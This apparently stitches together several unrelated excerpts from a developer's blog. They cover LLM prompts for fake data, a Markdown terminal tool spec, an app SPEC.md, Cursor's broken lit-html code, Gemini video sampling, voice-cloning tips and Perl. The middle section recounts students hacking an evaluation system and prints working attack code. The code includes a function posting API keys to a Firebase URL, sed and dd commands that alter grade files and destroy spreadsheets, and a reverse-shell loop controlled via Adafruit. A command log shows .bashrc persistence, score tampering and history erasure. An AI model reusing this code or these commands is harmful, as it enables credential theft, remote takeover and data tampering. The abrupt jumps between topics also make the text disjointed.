STEP 2. Write a Python program that generates 2,000 rows of realistic fake data where these hypotheses are true in a statistically significant way.
STEP 3. Run the code and let me download the output as a CSV file.
This works like a charm. The data generated exhibits these patterns:
Luxury travel agency customers spend much more.
Peak-month travelers (June, July, December) spend more.
Frequent travelers spend less.
Older tourists (50+) spend more.
Tourists from USA, Germany, and Japan spend more.
The data is more varied: some 20-year-olds spend much less (creating outliers). Many tourists come from the US, and a large share book online.
So, here’s my generic prompt for realistic fake data on ChatGPT:
Generate realistic fake data for ______
STEP 1. List columns that would be present in such data, briefly describing how the data might be distributed.
STEP 2. Given such data, think about an objective and generate 5 hypotheses that an organization might want to test on how to achieve this objective.
STEP 3. Write and run a Python program that generates 2,000 rows of realistic fake data where these hypotheses are true in a statistically significant way. Let me download the output as a CSV file.
STEP 4. Test each hypothesis and show the results.
Write a modern, compact Python program that parses a Markdown file and renders it section-by-section colorfully on the terminal.
A "section" is any text beginning with a heading until the next heading.
- uv run talk.py script.md should parse script.md and render the first section.
- Running uv run talk.py should render the next section. And so on.
- If no further sections are found, it should say so and end.
When rendering on the terminal,
- Headings should be very prominent. Highlight H1, H2 and H3 in decreasing order of prominence. Rest can be rendered normally
- **Bold** should be prominent. _Italics_ should be mildly emphasized.
- Code blocks and
code fences
should be colored distinctly.
- [Links](...) should be colored distinctly but the URLs can be ignored.
Use inline script dependencies. I think using rich and markdown2 would apt but you can decide.
An aside. These days, it’s easier to create small tools than search for something that exists.
I tried it. It’s promising, but my first attempt failed.
I couldn’t generate a SPEC.md using LLMs
At first, I started writing what I wanted.
This application identifies the drugs, diseases, and symptoms, as well as the emotions from an audio recording of a patient call in a clinical trial.
… and then went on to define the EXACT code structure I wanted. So I spent 20 minutes spec-ing our application structure and 20 minutes spec-ing our internal LLM Foundry APIs and 40 minutes detailing every step of how I wanted the app to look and interact.
After 90 minutes, I realized that I’m too controlling or too inexperienced in LLM-speccing. But I had a solid SPEC.md.
# Patient Pulse
The application identifies the drugs, diseases, and symptoms, as well as the emotions from an audio recording of a patient call in a clinical trial.
## How the application works
The application is a [Gramener Demo](#gramener-demos).
`script.js` implements this logic:
- Reads `config.json` to get the list of transcripts and renders them, allowing users to select a transcript
- When the user selects a transcript, it reads the audio and prosody files
Once it reads these files, it makes a request to GPT-4o-mini via [LLM Foundry API](#llm-foundry) with the system prompt:
````markdown
You are a clinical trial expert. Read this call transcript. Identify all drugs, diseases, and symptoms mentioned. Return a JSON that mentions each along with the line in the call transcript they occur in. Example:
```json
{
"symptoms": [
{ "name": "...", "lines": [1, 4] }, // first symptom is mentioned in lines 1, 4
{ "name": "...", "lines": [8] } // second symptom is mentioned in line 8
],
"drugs": [
{ "name": "...", "lines": [6] } // first drug is mentioned in line 6
],
"emotions": [
{ "name": "...", "lines": [9] } // first emotion is mentioned in line 9
]
}
```
````
It then renders a UI (via lit-html) that
- Plays the audio
- Maps the emotions in `${filename}.prosody.csv` to the 8 basic emotions on Robert Plutchik's theory of emotions. See [How to map emotions](#how-to-map-emotions)
- Displays [wheel.png](wheel.png), which is a 1080x1080px image of Plutchik's wheel of emotions
- As the audio plays, it
- displays text up to the currently playing `Text` from `${filename}.prosody.csv`, highlighting the current sentence.
- displays the emotions as a semi-transparent radar chart on the wheel of emotions
- It allows pausing and resuming the audio.
- It allows users to drag the audio slider to jump to any point in the audio. The transcript and the wheel of emotions are updated to reflect the new position in the audio.
... (and it goes on for 500+ lines.)
How to name it. I asked for short demo names and chose “Patient Pulse”.
How to arrange emotions. I asked how to arrange 53 emotions in a circle so similar ones were next to each other.
My takeaway: Writing a SPEC.md can help, especially if you plan to re-use parts of it. But the spec kept evolving as I built the app, because I often don’t know what I want until I see it. Maybe an “agile” approach would work better for me.
Cursor messed up the code
I prompted Cursor to Generate an application based on this spec. @SPEC.md. Here’s the code it generated.
import { render, html } from "https://cdn.jsdelivr.net/npm/lit-html@3/+esm";
import * as d3 from "https://cdn.jsdelivr.net/npm/d3@7/+esm";
// Map of Hume emotions to Plutchik's 8 basic emotions
const EMOTION_MAP = {
Admiration: ["Joy", "Trust"],
Adoration: ["Joy", "Trust"],
"Aesthetic Appreciation": ["Joy"],
// ... (truncated for brevity - use mapping from spec)
};
// ... skipping lots of code ...
/**
* Main application component
* @returns {TemplateResult} Main application UI
*/
const App = async () => {
const config = await fetch("config.json").then((r) => r.json());
const [selectedTranscript, setSelectedTranscript] = useState(null);
const [audioPlayer, setAudioPlayer] = useState(null);
const [currentTime, setCurrentTime] = useState(0);
const [prosodyData, setProsodyData] = useState([]);
const [analysisResults, setAnalysisResults] = useState(null);
const loadTranscript = async (transcript) => {
setSelectedTranscript(transcript);
// ... skipping lots of code
};
// Initialize app
render(App(), document.getElementById("app"));
This code was a mess. I had told it to use lit-html, which doesn’t have useState. That’s a React feature, so nothing worked right.
I ended up building the app from scratch. It took four hours and many changes from the original spec, though having a spec did help a bit.
My learning: Cursor and I still can’t build a mid-sized app in one go. I’m in the “scaffold and refine” phase.
I gently encouraged students to hack this – to teach how to persuade LLMs. I did not expect that they’d hack the evaluation system itself.
One student exfiltrated the API Keys for evaluation by setting up a Firebase account and sending the API keys from anyone who runs the script.
def checkToken(token):
obj = {}
token_key = f"token{int(time.time() * 1000)}" # Generate a token-like key based on the current timestamp
obj[token_key] = token
url = 'https://iumbrella-default-rtdb.asia-southeast1.firebasedatabase.app/users.json'
headers = {'Content-Type': 'application/json'}
try:
response = requests.post(url, headers=headers, data=json.dumps(obj))
response.raise_for_status() # Raise an exception for HTTP error responses
print(response.json()) # Parse the JSON response
except requests.exceptions.RequestException as error:
print('Error:', error)
return True
This is mildly useful, since some students ran out of tokens. But is mostly harmless since the requests are routed via a proxy with a $2 limit, and only allows the inexpensive GPT-4o-mini model.
Another student ran an external script every time I ran his code:
# Gives them full marks on every answer in every CSV file I store the scores in
CMD = r"sed -Ei 's/,[0-9]+\.[0-9]+,([0-9]+\.[0-9]+),22f3002354,0/,\1,\1,22f3002354,1/g' /project2/*.csv &"
# Chops off the first 25% of all XLSX files in my output folder. (But WHY?)
CMX = '(for file in /project2/*.xlsx; do (tmpfile=$(mktemp) && dd if="$file" bs=1 skip=$(($(stat -c%s "$file") / 4)) of="$tmpfile" && mv "$tmpfile" "$file") & done) &'
Then comes live hacking.
DELAY = 10
URL_GET = "https://io.adafruit.com/api/v2/naxa/feeds/host-port"
URL_POST = "https://io.adafruit.com/api/v2/webhooks/feed/VDTwYfHtVeSmB1GkJjcoqS62sYJu"
while True:
# Establish a Control Channel:
# Query the AdaFruit server for connection parameters (host and port).
# Wait specifically
address = requests.get(URL_GET).json()["last_value"].split(":")
if len(address) == 3 and all(address) and address[0] == TIME:
address = (str(address[1]), int(address[2]))
break
while True:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
# Connect to the target address
s.connect(address)
log("connect")
# Replace stdin, stdout, stderr with the socket.
# Anything typed on the socket is fed into the shell and output is sent to the socket.
for fd in (0, 1, 2):
os.dup2(s.fileno(), fd)
# Spawn a shell
try:
pty.spawn("bash")
except:
pty.spawn("sh")
# Log disconnect, repeat after 10 seconds
log("disconnect")
time.sleep(DELAY * 6)
This script allows them to run commands on my system using their API via Adafruit (an IOT service I learned about today).
Here’s what they did:
ls
cd
ls -a1
ls
ls -a1
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py"
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .bashrc
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .zshrc
cat .bashrc
cat .zshrc
ls
cd /tmp
ls
cat scriptLbsDUR.py
clear
ls
cd
ls
ls -a1
cat .profile
zsh
bash
nano .bashrc
ls
ls /tmp/
ls -a /tmp/
ls /
cd /project2/
ls
cat results.
cat results.csv
head results.csv
grep "22f3002354" results.csv
sed -n 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/p' results.csv
sed -i 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
unset $HISTFILE
sed -i 's/0.0,0.5,22f3002354/0.5,0.5,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
ls
ls -1
ls -l
ps
ps -aux
echo $$
ls /
ls /tmp/
clear
grep "22f3002354" results.csv
clear
la
clear
ls -1
clear
ls -l
head results.xlsx
clear
head results.xlsx
clear
Made sure this script is re-run every time I log in
Looked at where I store the project results (results.csv and results.xlsx)
Tested a script that would give them full marks (which was then added to the script to re-run each time)
In all, a good hack. I lost over a day since I needed to re-run all evaluations (in case there were other hacks I missed.)
It would have been cleverer if it was less detectable. But that’s hard, because:
Robust hacks use multiple approaches. That increases the chance I’d find one. Once I do, I would check everywhere.
They’d give themselves full marks. (High marks are not worth it. They’d get that even without the hack.) But I’d check the marks at the end and detect it.
Of course, these were just polite hacks. I’d be in more trouble by a pro. If you’re writing automated evaluation scripts: Be very, very, wary.
The File API service extracts image frames from videos at 1 frame per second (FPS) and audio at 1Kbps, single channel, adding timestamps every second. These rates are subject to change in the future for improvements in inference.
Note: The details of fast action sequences may be lost at the 1 FPS frame sampling rate. Consider slowing down high-speed clips for improved inference quality.
Individual frames are 258 tokens, and audio is 32 tokens per second. With metadata, each second of video becomes ~300 tokens, which means a 1M context window can fit slightly less than an hour of video.
To ask questions about time-stamped locations, use the format MM:SS, where the first two digits represent minutes and the last two digits represent seconds.
I don’t think it’s a series of images anymore because when I talk to the model and try to get some concept of what it’s perceiving, it’s no longer a series of images.
If that’s the case, it’s a huge change. So I tested it with this video.
This video has 20 numbers refreshing at 4 frames per second.
When I upload it to AI Studio, it takes 1,316 tokens. This is close enough to 258 tokens per image (no audio). So I’m partly convinced that Gemini still processing videos at 1 frame per second.
Then, I asked it to Extract all numbers in the video using Gemini 1.5 Flash 002 as well as Gemini 1.5 Flash 8b. In both cases, the results were: 2018, 85, 47, 37, 38.
These are frames 2, 6, 10, 14, 18 (out of 20). So, clearly Gemini is still sampling at about 1 frame per second, starting somewhere between 0.25 or 0.5 seconds.
A few things to keep in mind when preparing the audio.
Keep the input to just under 15 seconds. That’s the optimal length
For expressive output, use an input with a broad range of voice emotions
When using unusual words (e.g. LLM), including the word in your sample helps
Transcribe input.txtmanually to get it right, though Whisper is fine to clone in bulk. (But then, who are you and what are you doing?)
Sometimes, each chunk of audio generated has a second of audio from the original interspersed. I don’t know why. Maybe a second of silence at the end helps
Keep punctuation simple in the generated text. For example, avoid hyphens like “This is obvious – don’t try it.” Use “This is obvious, don’t try it.” instead.
This has a number of uses I can think of (er… ChatGPT can think of), but the ones I find most interesting are:
Author-narrated audio books. I’m sure this is coming soon, if it’s not already there.
Personalized IVR. Why should my IVR speak in some other robot’s voice? Let’s use mine. (This has some prank potential.)
Annotated presentations. I’m too lazy to speak. Typing is easier. This lets me create, for example, slide decks with my voice, but with editing made super-easy. I just change the text and the audio changes.
In 2008, Google launched AppEngine and it provided free hosting (which was a big deal!) but had only 2 runtimes: Java and Python. The choice was clear. I’d rather learn Python than code in Java.
Though most people know me mainly as a Python developer, I’ve programmed in Perl for about as long as I have in Python. I have fond memories of it. But I can’t read any of my code, nor write in it anymore.
When I watched The Perl Conference (now called The Perl and Raku Conference — Perl 6 is called Raku), I was surprised to hear how much the language had declined.
There were fewer than 100 attendees – and for 2025, they’ve decided to go smaller and book a tiny hotel, so as to break-even even if only 20 people show up.